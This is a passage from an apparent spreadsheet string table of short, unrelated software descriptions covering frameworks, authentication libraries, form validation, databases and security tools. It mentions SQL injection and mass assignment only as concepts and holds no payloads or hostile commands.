    <t>Uploading of digital rights management (DRM) protected ebooks purchased outside of Google Play Books is not supported.1 The use of Google Play Books requires a Google account.</t>
  </si>
  <si>
    <t>The developers track which standard requirements have been implemented, and have documented these capabilities on the Compliance page.</t>
  </si>
  <si>
    <t>As far as I know, Sqlite3 supports foreign keys since version 3.6.x.</t>
  </si>
  <si>
    <t>While similar to NSSlider, it provides a more customized visual feedback to the user.</t>
  </si>
  <si>
    <t>MVC Foolproof Validation is a library that complements the Data Annotation validation provided in ASP.NET MVC.</t>
  </si>
  <si>
    <t>A reusable application to preform ajax validation on django forms.</t>
  </si>
  <si>
    <t>A jQuery plugin that allows barcode generation.</t>
  </si>
  <si>
    <t>Charm is a framework for rapidly prototyping advanced cryptosystems in Python.</t>
  </si>
  <si>
    <t>Kapacitor is InfluxDB's native data processing, alerting and anomaly-detection engine.</t>
  </si>
  <si>
    <t>Substrate is a framework for Blockchain prototyping and development written in Rust.</t>
  </si>
  <si>
    <t>Foreign keys are a data integrity feature of relational (and SQL) databases.</t>
  </si>
  <si>
    <t>In addition, penalties for fraudulent financial activity are much more severe.</t>
  </si>
  <si>
    <t>If your application is not using Eloquent, you may use the database authentication driver which uses the Laravel query builder.</t>
  </si>
  <si>
    <t>The validation rules for this form field.</t>
  </si>
  <si>
    <t>No vendor lock-in Deploy BaasBox anywhere you like with SDKs for iOS, Android and Javascript
The coolest thing in this new 0.8.2 release is the enhancement of the iOS SDKs, now we support to login with Facebook and G+.</t>
  </si>
  <si>
    <t>Multi-datacenter high availability and hot backups.</t>
  </si>
  <si>
    <t>Automatic form validation for Breeze entities.</t>
  </si>
  <si>
    <t>This allows user interface scripting, animation, automation, client-side validation, and much more.</t>
  </si>
  <si>
    <t>This capability is useful for addressing compliance requirements such as PCI-DSS.</t>
  </si>
  <si>
    <t>Substrate is a framework for blockchain prototyping and development written in rust.</t>
  </si>
  <si>
    <t>FormEncode validation can be used separately from the form generation.</t>
  </si>
  <si>
    <t>You should also know that authenticating requests with a database secret (in your case DEFAULT_TOKEN) has been deprecated by Firebase, and to be prepared for the day when Google discontinues support for database secrets, you should migrate to service account based authentication rather sooner than later.</t>
  </si>
  <si>
    <t>OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.</t>
  </si>
  <si>
    <t>The SDK and documentation are available at:
Intel Software Guard Extensions SDK for Windows and Linux
Requirements
SGX requires 6th Generation Intel Core Processors (Skylake) or later.</t>
  </si>
  <si>
    <t>Text processing includes basic processing jobs using filter, tokenization or normalization method to process text.</t>
  </si>
  <si>
    <t>New language features are:
Reference semantics with value types
Non-trailing named arguments
Leading underscores in numeric literals
private protected access modifier</t>
  </si>
  <si>
    <t>Hyperledger Explorer
Hyperledger Explorer is a simple, powerful, easy-to-use, highly maintainable, open source browser for viewing activity on the underlying blockchain network.</t>
  </si>
  <si>
    <t xml:space="preserve">
The HTML keygen element exists to facilitate generation of key material, and submission of the public-key as part of an html form.</t>
  </si>
  <si>
    <t>A set of processes or functionality that tracks changes to one or more components of a system, ensuring the completeness and accuracy of transaction processing, authorization, and validity of system operations.</t>
  </si>
  <si>
    <t>CollabNet Subversion Edge is a distribution of the Subversion source control software that includes a web console and server monitoring tools.</t>
  </si>
  <si>
    <t>Custom Styles: With guaranteed document validity, you can style borders, alignment, fills, fonts, and number formats in a single line of code.</t>
  </si>
  <si>
    <t>Usually the form submission handler saves the data in a database table, but in some cases a module just outputs some data basing on what users entered.</t>
  </si>
  <si>
    <t>java
A new sdk with the following imporvements:
New features
Non-blocking I/O
Pluggable HTTP layer
API changes
Client Builders
Immutable POJOs
Streaming
More information here</t>
  </si>
  <si>
    <t>The CMS supports plugins and has built-in support for, among others, Forums, Blogs, Photo galleries, an E-commerce feature, Event Calendar, Google Maps, Chat, Secure File Sharing, Newsletter, Surveys etc.</t>
  </si>
  <si>
    <t>TestLink is a web-based test management software that facilitates software quality assurance.</t>
  </si>
  <si>
    <t>django-validation refers to form and field validation tools provided by Django out of the box.</t>
  </si>
  <si>
    <t>For instance:
Oracle provides Virtual Private Database (VPD), a free feature of the Oracle Enterprise Database.</t>
  </si>
  <si>
    <t>Authoring well-behaved packages which meet all of these requirements can be tricky, so several tools exist to make deb creation easier or verify compliance with policies.</t>
  </si>
  <si>
    <t>Thinktecture IdentityModel  is a versatile helper library to make working with Claims Based Authentication and Windows Identity Foundation easier.</t>
  </si>
  <si>
    <t>IBM Sterling is a B2B platform offering secure file transfer, integration with other businesses, supply chain management,...</t>
  </si>
  <si>
    <t>An oracle DBA works in Oracle databases on the aspects of database usage not directly related to the insertion and extraction of information, such as security, configuration and performance fine-tuning.</t>
  </si>
  <si>
    <t>It supports the similar optimizations to Spark DataFrames providing type-safe programming interface at the same time.</t>
  </si>
  <si>
    <t>FormIt provides the following functionality: form validation, basic spam protection, reCaptcha, email sending etc.</t>
  </si>
  <si>
    <t>It provides a suite of middleware that, combined with Passport authentication strategies and application-specific route handlers, can be used to assemble a server that implements the OAuth 2.0 protocol.</t>
  </si>
  <si>
    <t>The json based API supports CRUD and data model operations, Basic or JWT authentication, role-based authorization and CORS.</t>
  </si>
  <si>
    <t>With simple API calls, you can launch and stop container-enabled applications, query the complete state of your cluster, and access many familiar features like security groups, Elastic Load Balancing, EBS volumes, and IAM roles.</t>
  </si>
  <si>
    <t>This allows for major enhancements in security and performance.</t>
  </si>
  <si>
    <t>In 2001 Intel and HP intrduced Itanium processor based on IA-64 architecture.</t>
  </si>
  <si>
    <t>Notable changes:
New My Account space to collect all your data in once place
Execute Analysis permission can now be granted at the project level
OAuth2 support
New Code page to list and search for the files in your project
Server restart from the UI
JavaScript and C# plugins embedded by default
Cross-module duplication is back!</t>
  </si>
  <si>
    <t>WSO2 Governance Registry is an enterprise-ready open-source product for governing SOA deployments.</t>
  </si>
  <si>
    <t>Authentication-Flows is a powerful and highly customizable framework that covers all flows that authentication-server that is based on Spring-Security needs.</t>
  </si>
  <si>
    <t>A PHP class offering Web developers a simple, yet immensely powerful "drop in" permission system to their current Web based applications.</t>
  </si>
  <si>
    <t>In typical cross-validation, the training and validation sets must cross-over in successive rounds such that each data point has a chance of being validated against.</t>
  </si>
  <si>
    <t>The benefits include support for externalized content, localization, compile-on-the-fly editing, environment-based configuration, baked-in application security and more.</t>
  </si>
  <si>
    <t>Shrine is a file upload toolkit for Ruby, it's designed to be simple, extensible, secure and fast, and provides an abstraction for different storages.</t>
  </si>
  <si>
    <t>Document management capabilitiesmake it easy to manage compliance records and content creation projects.</t>
  </si>
  <si>
    <t>Upsizing is a feature of Microsoft Access for upgrading an Access database to a SQL Server database while still retaining accessibility through Microsoft Access.</t>
  </si>
  <si>
    <t>It enables additional features that are not available in Standard Edition:
Integrated Windows Authentication (IWA).</t>
  </si>
  <si>
    <t>For more advanced querying scenarios, Dapper Extensions provides a predicate system.</t>
  </si>
  <si>
    <t>Two-factor authentication is a type of multi-factor authentication.</t>
  </si>
  <si>
    <t>Supports SMTP, POP3 and IMAP including SSL
Prevents accidental email leaking to real mail servers
Provides different deployment models, such as a simple standalone JVM process, as a WAR module, as a JBoss GreenMail Service or docker image
Easily embeddable in JUnit tests for integration testing
Lightweight with few dependencies
GreenMail is the first and only library that offers a test framework for both receiving and retrieving emails from Java.</t>
  </si>
  <si>
    <t>TICoreDataSync is an open source framework, enabling cloud-based synchronization (with optional encryption) for Core Data applications running on both Mac OS X and iOS.</t>
  </si>
  <si>
    <t>Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as authentication, routing, sessions, and caching.</t>
  </si>
  <si>
    <t>Repositories refer to multiple storage locations or where code or development projects, and or task can be stored often for safety or preservation of code work.</t>
  </si>
  <si>
    <t>The SSL library shipped with the Espressif SDK supports only 4 cipher suites.</t>
  </si>
  <si>
    <t>The Subversive project aims to provide Subversion (SVN) integration for Eclipse.</t>
  </si>
  <si>
    <t>QueryDSL integration to support type-safe queries.</t>
  </si>
  <si>
    <t>SQL injection is possible if the attacker-supplied string is fed "as is" into SQL that later runs on the database engine.</t>
  </si>
  <si>
    <t>Parsley.js is a Javascript library to validate forms built on top of jQuery.</t>
  </si>
  <si>
    <t>Server-side and client-side validation, several common rules provided.</t>
  </si>
  <si>
    <t>CModel defines the basic framework for data models that need to be validated.</t>
  </si>
  <si>
    <t>Reference:
Form validation plugin page</t>
  </si>
  <si>
    <t>A security constraint includes an authorization constraint that specifies whether users can access the path.</t>
  </si>
  <si>
    <t>See the
License for the specific language governing permissions and limitations.</t>
  </si>
  <si>
    <t>How do I make my database queries secure from SQL injection?</t>
  </si>
  <si>
    <t>When present, it specifies that the form-data (input) should not be validated when submitted.</t>
  </si>
  <si>
    <t>New in V6.8: This release supports BACnet revision 15 without Network Security (Addendum 2008g) and lighting related functionality (Addendum 135-2010aa, 135-2010i).</t>
  </si>
  <si>
    <t>A valid license is required to use advanced features.</t>
  </si>
  <si>
    <t>MoinMoin supports access control lists
MoinMoin is easy to extend</t>
  </si>
  <si>
    <t>Note: HTML5 Constraint validation doesn't remove the need for validation on the server side.</t>
  </si>
  <si>
    <t>Check submitted data against a set of validation rules.</t>
  </si>
  <si>
    <t>The most notable distinction to other authorization plugins is the declarative approach.</t>
  </si>
  <si>
    <t>Optional tight integration with viper for 12-factor apps
See also the official homepage.</t>
  </si>
  <si>
    <t>Moreover, nonhuman activity (search engine crawlers, email harvesters, and botnets) may be mistaken for human users.</t>
  </si>
  <si>
    <t>Feature List
Built in user management and permissions
Supports addons and extensions
Support for fully HTML templated modules allowing the webmaster to change content display through simple HTML and without modifying the application code.</t>
  </si>
  <si>
    <t>Main Resource:  DocuSign Developer Center
Language-specific libraries: DocuSign GitHub Repository
Common tasks you can accomplish with the DocuSign API:
Request legally binding signatures on virtually any type of document
Embed document signing into your app or website
Collect form-data from recipients
Track documents in real-time
Enable multi-factor recipient authentication
Much more...
See API Recipes page for code samples showing common API workflows like sending documents for signature, embedded signing, polling for status, etc.</t>
  </si>
  <si>
    <t>DbDefence for Microsoft SQL Server implements server-side encryption and additional level of protection for databases.</t>
  </si>
  <si>
    <t>Theoretical access to USML items by foreign persons (including Dual and Third Country Nationals) can create difficulties for the engagement of IT professionals from overseas as network administrators or the use of overseas companies to support IT systems.</t>
  </si>
  <si>
    <t>While .NET Reactor offers a licensing system based on native code protection, IntelliLock opts a 100% managed way to apply licensing and protection features.</t>
  </si>
  <si>
    <t>The Branch Metrics SDK enables developers to integrate their apps with deep linking, contextual deep linking, organic, paid and referral attribution, and app-to-app communication.</t>
  </si>
  <si>
    <t>The toolkit includes software for security, information infrastructure, resource management, data management, communication, fault detection, and portability.</t>
  </si>
  <si>
    <t>You can set protected attributes with the $protected_attributes array:
class Post_model extends MY_Model
{
    public $protected_attributes = array( 'id', 'hash' );
}
Now, when insert or update is called, the attributes will automatically be removed from the array, and, thus, protected:
$this-&gt;post_model-&gt;insert(array(
    'id' =&gt; 2,
    'hash' =&gt; 'aqe3fwrga23fw243fWE',
    'title' =&gt; 'A new post'
));
// SQL: INSERT INTO posts (title) VALUES ('A new post')
Relationships
MY_Model now has support for basic belongs_to and has_many relationships.</t>
  </si>
  <si>
    <t>In Windows 7, the Windows Biometric Framework (WBF) provides support for fingerprint biometric devices through a new set of components.</t>
  </si>
  <si>
    <t>Django OAuth Toolkit can help you providing out of the box all the endpoints, data and logic needed to add OAuth2 capabilities to your Django projects</t>
  </si>
  <si>
    <t>Sage Pay was previously known as Protx and offers online handling of payments - they support functionality for kiosk in customer retail stores and also support PayPal integration.</t>
  </si>
  <si>
    <t>The core ClamAV library provides numerous file format detection mechanisms, file unpacking support, archive support, and multiple signature languages for detecting threats.</t>
  </si>
  <si>
    <t>Ninja Forms Features:
Custom input masks allow you to restrict user input in your forms for things like phone numbers, currency, and dates.</t>
  </si>
  <si>
    <t>Validating AMP pages
There are five ways to validate an AMP page: 
Browser Developer Console - Add  to the URL, for example http://localhost:8000/released.amp.html#development=1, then check the browser console for validation errors.</t>
  </si>
  <si>
    <t>Pass external errors to the form to invalidate elements
You can dynamically add form elements to your form and they will register/unregister to the form</t>
  </si>
  <si>
    <t>Datalogics PDF Java Toolkit is a native Java library that provides high-level APIs for automating PDF workflows like processing PDF forms, verifying digital signatures, and extracting text.</t>
  </si>
  <si>
    <t>gQuery additionally's plenty of features like its Type safe system, its Ajax api, and its data-binding handling, which make that to consume 3party services were much easier than using RequestBuilder.</t>
  </si>
  <si>
    <t>Formidable reads submitted form data and processes it according to predefined rules.</t>
  </si>
  <si>
    <t>A peer-to-peer (P2P) network is a type of decentralized and distributed network architecture in which individual nodes in the network (called "peers") act as both suppliers and consumers of resources, in contrast to the centralized clientserver model where client nodes request access to resources provided by central servers.</t>
  </si>
  <si>
    <t>A foreign key is a set of attributes in a relational table that is subject to a referential integrity constraint.</t>
  </si>
  <si>
    <t>Using SecurEntity
Your Entity Framework data model entities must extend the SecurEntity abstract class.</t>
  </si>
  <si>
    <t>Google Vault lets you retain, hold, search, and export data to support your organizations archiving and eDiscovery needs.</t>
  </si>
  <si>
    <t>The compiler, fbc, currently supports building for i386-based architectures on the protected-mode extended DOS, Linux, Windows and Xbox platforms.</t>
  </si>
  <si>
    <t>FDF data is most often used for form filling and annotations, but can also contain other data types, including:
X.509 certificates
Requests for certificates
Directory settings
Timestamp server settings
Embedded PDF files
The correct MIME Type to use for .fdf files is application/vnd.fdf.</t>
  </si>
  <si>
    <t>Different kinds of validation
In evaluating the basics of data validation, generalizations can be made regarding the different types of validation, according to the scope, complexity, and purpose of the various validation operations to be carried out.</t>
  </si>
  <si>
    <t>Specman is a simulator for `e` (IEEE 1647), an Aspect Oriented Programming (AOP) hardware verification language that enables constrained-random stimulus generation and coverage.</t>
  </si>
  <si>
    <t>Authentication-Flows is a powerful and highly customizable framework that covers all flows that authentication-server that is based on spring-security needs.</t>
  </si>
  <si>
    <t>Remote access : use any SSH client to connect to Karaf and issue commands in the console
Security framework : It provides a complete security framework (based on JAAS), and providing rbac (Role-Based Access Control) mechanism for console and jmx.</t>
  </si>
  <si>
    <t>&lt;cfform&gt; allow for client side data validation for things like
required fields
numeric only fields
data only fields
Other fields have completely new capabilities 
&lt;cftextarea richtext="yes"&gt; creates a WYSIWYG HTML editor
&lt;cfform format="flash"&gt; makes flash based forms instead of HTML.</t>
  </si>
  <si>
    <t>The Facebook Open Graph allows apps to model user activities based on actions and objects and to become part of the user's identity and social graph.</t>
  </si>
  <si>
    <t>Annotation-based conditional validation library.</t>
  </si>
  <si>
    <t>InSpec is an rspec-based audit testing framework.</t>
  </si>
  <si>
    <t>Drawing API - to create basic shapes and advanced charts, write text on the image
Masking functionality - ability to apply black&amp;white or grayscale images as masks, leading to semi-transparency or absolute transparency of the image the mask is being applied to
The above tools should be the basic foundation for a more powerful set of tools that are called Filters in Imagine.</t>
  </si>
  <si>
    <t>However, the technical choices Microsoft made in the Remote Monitoring solution aren't the only way to implement a remote monitoring IoT solution.</t>
  </si>
  <si>
    <t>It can be used to enhance a wide variety of business functions, from auto-populating website forms to verifying customer credentials.</t>
  </si>
  <si>
    <t>Expect adds many extensions to the Tcl scripting language which simplify scripting interactive applications controlling such hard-to-interact programs as, for example, , ftp, passwd, fsck, rlogin, tip, ssh, and others.</t>
  </si>
  <si>
    <t>References
Linux Tweaking
Zend engine's hashtable performance tweaks
Firefox/IE Browser Tweaks
Microsoft Dynamics CRM and IE8 Tweak
Apache Isis: Tweaking the UI using CSS classes
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/
Handy Tweaks To Make GIMP Replace Photoshop
JDev  Ant build file tweak required for ojdeploy option
Silverlight 3 Navigation Application: New Themes and Tweaks
Android: Tweaking Timeouts
Updating and Tweaking your Firefox OS Developer Preview phone/Geeksphone
LAN Tweaking
Host Resolution Priority Tweak</t>
  </si>
  <si>
    <t>I've use "ssh-exec-maven-plugin" plugin with Maven Java Application and it works.</t>
  </si>
  <si>
    <t>Capture, maintain and present your data
The validity of data is essential for serious applications.</t>
  </si>
  <si>
    <t>In addition, Plone comes with a user management system called Pluggable Authentication Service.</t>
  </si>
  <si>
    <t>Use the submitHandler callback function to deal with successfully validated forms and/or submit via ajax.</t>
  </si>
  <si>
    <t>Captures
Login pane added to a JXLoginDialog:
Login pane added to a JXLoginFrame (note minimize/maximize buttons at the top-right corner):
Login Service back-end
The login/authentication framework also includes the following classes and interfaces that constitute the login service's back-end:
LoginService: abstract base class whose responsibility is to
implement the logic to properly validate user's credentials.</t>
  </si>
  <si>
    <t>The deployment should contain something like the following in the runtime settings:
As @silent pointed out in the comments, the documentation is here, including an example deployment that includes container registry credentials.</t>
  </si>
  <si>
    <t>It provides a rich, powerful, and extensible SSH API that enables developers to gain access to SSH servers and to develop entire SSH client/server frameworks.</t>
  </si>
  <si>
    <t>UWP has a bug in the framework pertaining to caching behavior that causes Auth errors for Azure Storage.</t>
  </si>
  <si>
    <t>For example:
Of course, you'll want to do some validation to make sure that the widget is a text or entry widget.</t>
  </si>
  <si>
    <t>An authentication module for Play Framework applications supporting OAuth, OAuth2, OpenID, Username/Password and custom authentication schemes.</t>
  </si>
  <si>
    <t>A comprehensive set of strategies support authentication using a username and password, Facebook, Twitter, and more.</t>
  </si>
  <si>
    <t>A sub project of hibernate that aims to enable easy auditing of persistent classes.</t>
  </si>
  <si>
    <t>With its pluggable strategies it can support all kinds of authentication and authorization mechanisms.</t>
  </si>
  <si>
    <t>A comprehensive set of strategies support authentication using a username and password, Facebook, Twitter and more.</t>
  </si>
  <si>
    <t>.NET - Library for entity framework that allows full data auditing for the application.</t>
  </si>
  <si>
    <t>It can also add custom data, viewing options, and passwords to PDF files.</t>
  </si>
  <si>
    <t>Some of its features include code completion, signature help, diagnostics (squiggles), code actions (bulbs) and NuGet support.</t>
  </si>
  <si>
    <t>PKIX details X509 certificate formats, issuing rules and validation rules.</t>
  </si>
  <si>
    <t>Major networking standards, including Ethernet, WLAN, satellite networks, Bluetooth, and so on, are supported by ns-2.</t>
  </si>
  <si>
    <t>Store Kit is an iOS framework that allows an application to request payment from a user for additional functionality or content.</t>
  </si>
  <si>
    <t>It also has cross-cutting (Aspect like) capabilities in the form of Interceptors</t>
  </si>
  <si>
    <t>Connect is bundled with over 20 commonly used middleware including:
csrf
basicAuth
bodyParser
json
multipart
urlencoded
cookieParser
directory
compress
errorHandler
favicon
limit
logger
methodOverride
query
responseTime
session
static
staticCache
vhost
cookieSession
GitHub</t>
  </si>
  <si>
    <t>WebP supports lossless transparency (also known as alpha channel) with just 22% additional bytes.</t>
  </si>
  <si>
    <t>It is part of the standard form validation framework developed by Microsoft for ASP.NET.</t>
  </si>
  <si>
    <t>The validation rules in the action class could be exposed using annotations.</t>
  </si>
  <si>
    <t>User-submitted form data are validated either through regular expressions or PHP code.</t>
  </si>
  <si>
    <t>With database versioning, hiding fraudulent modifications becomes more difficult.</t>
  </si>
  <si>
    <t>It was built from the ground up with maximum scalability, easy management and security in mind.</t>
  </si>
  <si>
    <t>Support for distributed multi-datacenter type-safe queries.</t>
  </si>
  <si>
    <t>ALFA, the Axiomatics Language For Authorization, is a pseudo-code language used to simplify the authoring and development of access control policies.</t>
  </si>
  <si>
    <t>Intel compilers are optimized to computer systems using processors that support Intel architectures.</t>
  </si>
  <si>
    <t>In most cases validators get used within models to validate their properties (-method).</t>
  </si>
  <si>
    <t>Spring Security is a powerful and highly customizable authentication and access-control framework.</t>
  </si>
  <si>
    <t>Download additional strategies and place them in directories at path_to_opauth/Strategy.</t>
  </si>
  <si>
    <t>Redis
Redis is a BSD-licensed, advanced key-value store which works in-memory but provides disk persistence.</t>
  </si>
  <si>
    <t>Firewalls, proxy, trusts, security models, system architecture and other environmental factors can have programmability implications.</t>
  </si>
  <si>
    <t>Plugins for integration with IntelliJ IDEA, Eclipse, NetBeans, and Maven, JUnit integration, and command-line integration with other tools using , loadtestrunner.bat, securitytestrunner.bat etc.</t>
  </si>
  <si>
    <t>It is shipped with a cross-browser compatible template, along with client-side validation to modernize your application.</t>
  </si>
  <si>
    <t>Form handlers evaluate the validity of form data before it is submitted, check for errors, and determine what action to takefor example, submit the data, direct the user to a different page, and display an error message.</t>
  </si>
  <si>
    <t>At the same time, it also protects the existing database from direct Internet traffic and provides a high performance engine to interact with the Internet traffic.</t>
  </si>
  <si>
    <t>Features include:
small-form factor radio
low power
low cost
built-in security
robustness
ease-of-use
ad hoc networking abilities.</t>
  </si>
  <si>
    <t>the graphic below
so for enabling PG7 that is pin 40 on the physical header can be used 
   echo 199 &gt; sys/class/gpio/export
source of image : https://orange314.com/Hardware
normally the echo command like   echo "199"  sys/class/gpio/export  gives a Permission denied error
an easy solution are the following:  
To do a one-off manipulation of a GPIO pin, you have to start a
separate shell as a superuser first, then use echo.</t>
  </si>
  <si>
    <t>I recall VxWorks is of the opt-out variety largely perhaps because MMU protection is an option and opt-in would reduce code portability between systems with and without MMU support, while QNX on the other hand only runs on MMU hardware, so is of the opt-in variety.</t>
  </si>
  <si>
    <t>A Strong Named Key (also called SN Key or Strong Name) is used in the Microsoft .NET framework to uniquely identify a component.</t>
  </si>
  <si>
    <t>Without any precautions Model.new(params[:model]) allows attackers to set any database columns value.</t>
  </si>
  <si>
    <t>Aside from missing features, end-of-life server releases are likely missing important bug fixes and security improvements and will no longer be tested against current driver releases.</t>
  </si>
  <si>
    <t>jQuery.validity is designed to give you total control over how validation messages appear, so you can easily adapt the way validation errors are displayed to the look and feel of your site.</t>
  </si>
  <si>
    <t>A simple, lightweight JavaScript API for handling cookies (previously jquery-cookie)
Feature Overview
Crossbrowser
Doesn't rely on any framework
Supports AMD/CommonJS
Documentation &amp; Links
GitHub</t>
  </si>
  <si>
    <t>From functional testing, to performance testing to post-deployment monitoring, SmartBears API tools help you to deliver accurate, fast, and secure APIs.</t>
  </si>
  <si>
    <t>Main Features:
Shares calendars through CalDAV, WebDAV and HTTP
Shares contacts through CardDAV, WebDAV and HTTP
Supports events, todos, journal entries and business cards
Works out-of-the-box, no installation nor configuration required
Warns users on concurrent editing
Limits access by authentication
Secures connections
Supported Clients
Client Support:
Mozilla Lightning
GNOME Evolution
KDE KOrganizer
aCal, CalDAV-Sync and CardDAV-Sync for Google Android
CalDavZAP
CardDavMATE
Apple iPhone
Apple iCal
syncEvolution</t>
  </si>
  <si>
    <t>CODE
The task
The class of webserver
The Manifest
  &lt;Capabilities&gt;
    &lt;Capability Name="internetClient" /&gt;
    &lt;Capability Name="internetClientServer" /&gt;
    &lt;Capability Name="privateNetworkClientServer" /&gt;
  &lt;/Capabilities&gt;
Debug output
Debug: 1.1
Debug: 1.2
Debug: 1.3
Debug: 2
Debug: 2.2 - GET /index.html HTTP/1.1 Host: 192.168.1.146:8081
  Connection: keep-alive (and all the header...)
Debug: 3
Debug: 3.1
Debug: 3.2
Debug: 3.3 -         Baro Raspy WIoT    Hello world
  :D
Debug: 3.4
Debug: 3.5
Debug: 3.6
Debug: 3.7
Debug: 3.8
Debug: 4
Il thread 0x64c  terminato con il codice 0 (0x0).</t>
  </si>
  <si>
    <t>It also provides alerts generated according to some availability, performance, configuration or security situation being identified.</t>
  </si>
  <si>
    <t>A distinguishing feature is the usage of gossip protocol for propagating the data between cluster nodes which makes it decentralized and scalable.</t>
  </si>
  <si>
    <t>However, ASP.NET version 2.0 supports cookieless forms authentication, which results in the ticket being passed in a query string.</t>
  </si>
  <si>
    <t>The Cryptographic Application Programming Interface (also known variously as CryptoAPI, Microsoft Cryptography API, MS-CAPI or simply CAPI) is an application programming interface included with Microsoft Windows operating systems that provides services to enable developers to secure Windows-based applications using cryptography.</t>
  </si>
  <si>
    <t>Kylo offers a turn-key, enterprise-ready data lake solution that integrates best practices around metadata management, governance, and security gleaned from Think Big's 150+ big data implementation projects.</t>
  </si>
  <si>
    <t>From their description:
While the controller has many capabilities, our Arduino library currently only supports reading/writing tags, and does not support phone-to-shield communication, tag emulation (which requires an external 'secure element' only available from NXP) or other more advanced features at this time.</t>
  </si>
  <si>
    <t>List of features:
works out of the box, with full multimedia support and is extremely easy to use;
both free of cost and open-source;
community-driven;
based on Debian and Ubuntu, it provides about 30,000 packages and one of the best software managers;
safe and reliable.</t>
  </si>
  <si>
    <t>A number of security features exist, including dynamic passwords (where the password includes part of the date or time, or client IP address, or other dynamic elements), allow/deny security, a comprehensive inbound and outbound firewall, and an option to require a certain level of encryption in the workstation connection.</t>
  </si>
  <si>
    <t>Most modern processors, including the ARM on the Arduino Due have on-chip debug support accesses via a JTAG interface.</t>
  </si>
  <si>
    <t>the aspects of database usage not directly related to the insertion and extraction of information, such as security, configuration and performance finetuning</t>
  </si>
  <si>
    <t>VoltDB relies on horizontal partitioning down to the individual hardware thread to scale, k-safety (synchronous replication) to provide high availability, and a combination of continuous snapshots and command logging for durability (crash recovery).</t>
  </si>
  <si>
    <t>SQLAlchemy-Continuum is a versioning and auditing extension for SQLAlchemy.</t>
  </si>
  <si>
    <t>Synchronize Mac and iOS Core Data applications via Dropbox, WebDAV and more
TICoreDataSync is an open source (MIT License) framework, enabling cloud-based synchronization (with optional encryption) for Core Data applications running on both Mac OS X and iOS.</t>
  </si>
  <si>
    <t>The DocuSign console allows the centralized creation and management of PowerForms, including control of all workflow elements authentications, approvals, and routing order.</t>
  </si>
  <si>
    <t>Control various security aspects of your Silverlight-based application.</t>
  </si>
  <si>
    <t>Authentication capabilities are augmented by an integrated Certificate Authority based on the Dogtag project.</t>
  </si>
  <si>
    <t>Features include Facebook Login, Friend and Place pickers, session management, native object responses from the Graph API and Feed and Requests dialogs.</t>
  </si>
  <si>
    <t>User session management from both admin and user perspective
Customizable themes for user facing pages: login, grant pages, account management, emails, and admin console all customizable!</t>
  </si>
  <si>
    <t>ImapX 2 is a crossplatform IMAP library for .NET, supporting SSL/TLS, OAuth2 and all major GMail IMAP extensions.</t>
  </si>
  <si>
    <t>I need to get the data in the micro SD, which would be user and password, and its extension is .TXT, and pass it to my sqlite database, I have no idea how.</t>
  </si>
  <si>
    <t>Mozilla Persona is a decentralized authentication system for the web based on the open BrowserID protocol prototyped by Mozilla.</t>
  </si>
  <si>
    <t>Form Based Authentication (FBA) provides an authentication method using a web form.</t>
  </si>
  <si>
    <t>Hyperledger Composer (previously Fabric Composer) provides a layer of abstraction on top of the Hyperledger Fabric blockchain for building business applications.</t>
  </si>
  <si>
    <t>Simple login screen:
XAP is a complete framework for building Ajax applications.</t>
  </si>
  <si>
    <t>Kotlin combines OO and functional features and is focused on interoperability, safety, clarity, and tooling support.</t>
  </si>
  <si>
    <t>The project includes content management, user, group and permission handling.</t>
  </si>
  <si>
    <t>In addition, the clustered roles are proactively monitored to verify that they are working properly.</t>
  </si>
  <si>
    <t>ORDS is a Java Enterprise Edition (Java EE) data service middleware that provides security and caching in addition to RESTful Web Services.</t>
  </si>
  <si>
    <t>Current version includes JSF and CDI annotations support and Spring Security JSF Facelet Tag support.</t>
  </si>
  <si>
    <t>The major difference between the Server and Embedded versions is the lack of authentication/protection on the database.</t>
  </si>
  <si>
    <t>It features a versatile key management system as well as access modules for all kinds of public key directories.</t>
  </si>
  <si>
    <t>The ABAddressBook opaque type (whose instances are known as address books) provides a programming interface to the Address Booka centralized database used by multiple applications to store personal information about people.</t>
  </si>
  <si>
    <t>There can also be multiple competing schemas
They may cause web pages to fail validation  
In some cases they add additional "non-standard" html attributes (title attribute use on the abbr element is the most obvious; the BBC dropped Microformats because of its use/non-conformance to W3C Validation tests.</t>
  </si>
  <si>
    <t>The extension points (hooks) available with  include many of the hooks available to natively compiled Apache HTTP Server modules, such as mapping requests to files, generating dynamic responses, access control, authentication, and authorization.</t>
  </si>
  <si>
    <t>I am making an Android app in Android Studio, and I am using Firebase for authentication and the real-time database features.</t>
  </si>
  <si>
    <t>Process/Protocol Meta Language is a verification modelling language used to verify the logic of parallel systems.</t>
  </si>
  <si>
    <t>MSBI (Microsoft Business Intelligence) is a suite of tools providing solutions for Business Intelligence Queries.</t>
  </si>
  <si>
    <t>PGBrowser is a 'pretty good' mechanize-like php library for managing cookies and submitting forms.</t>
  </si>
  <si>
    <t>Bosun is an open-source, MIT licensed, monitoring and alerting system by Stack Exchange.</t>
  </si>
  <si>
    <t>SSSD is a system daemon that provides access to identity and authentication remote resource through a common framework that can provide caching and offline support to the system.</t>
  </si>
  <si>
    <t>Its purpose is to perform client-side form validation of user entered data.</t>
  </si>
  <si>
    <t>This plugin provides the capability to sign or verify a project artifact and attachments using jarsigner.</t>
  </si>
  <si>
    <t>For example, if you are using PHP to access a database, unless that database has built-in access control, you will have to make the database accessible to the "nobody" user.</t>
  </si>
  <si>
    <t>Automatic support for Guid and Integer primary keys (Includes manual support for other key types).</t>
  </si>
  <si>
    <t>Models are never locked and framework semantics assume updates are always coming in from a backend.</t>
  </si>
  <si>
    <t>With it, Laravel validation rules can be inserted into the model's class as a tag variable.</t>
  </si>
  <si>
    <t>Developers can use this application block to create validation rules for business objects that can be used across different layers of their applications.</t>
  </si>
  <si>
    <t>Instance and type interception (not supported in Unity for Windows
Store apps).</t>
  </si>
  <si>
    <t>In practice, this means that TCP is better suited for continuous transmission of data, whereas the more lightweight UDP can be used when reliability isn't important.</t>
  </si>
  <si>
    <t>A hashing function within the Microsoft Transact-SQL tsql Database Engine which supports the following algorithms: 
MD2
MD4
MD5
SHA 
SHA1
SHA2_256
SHA2_512 
Resources
Documentation</t>
  </si>
  <si>
    <t>The undocumented features of foreign games are often elements that were not localized from their native language.</t>
  </si>
  <si>
    <t>It hardly takes any effort for the developer to integrate CAL into his API and once integrated into his application the activation process is automatic.</t>
  </si>
  <si>
    <t>The private mailbox database design gives the server considerable advantages in efficiency, scalability, and administratability.</t>
  </si>
  <si>
    <t>Some features were added in this release like:
Extended do not disturb-mode
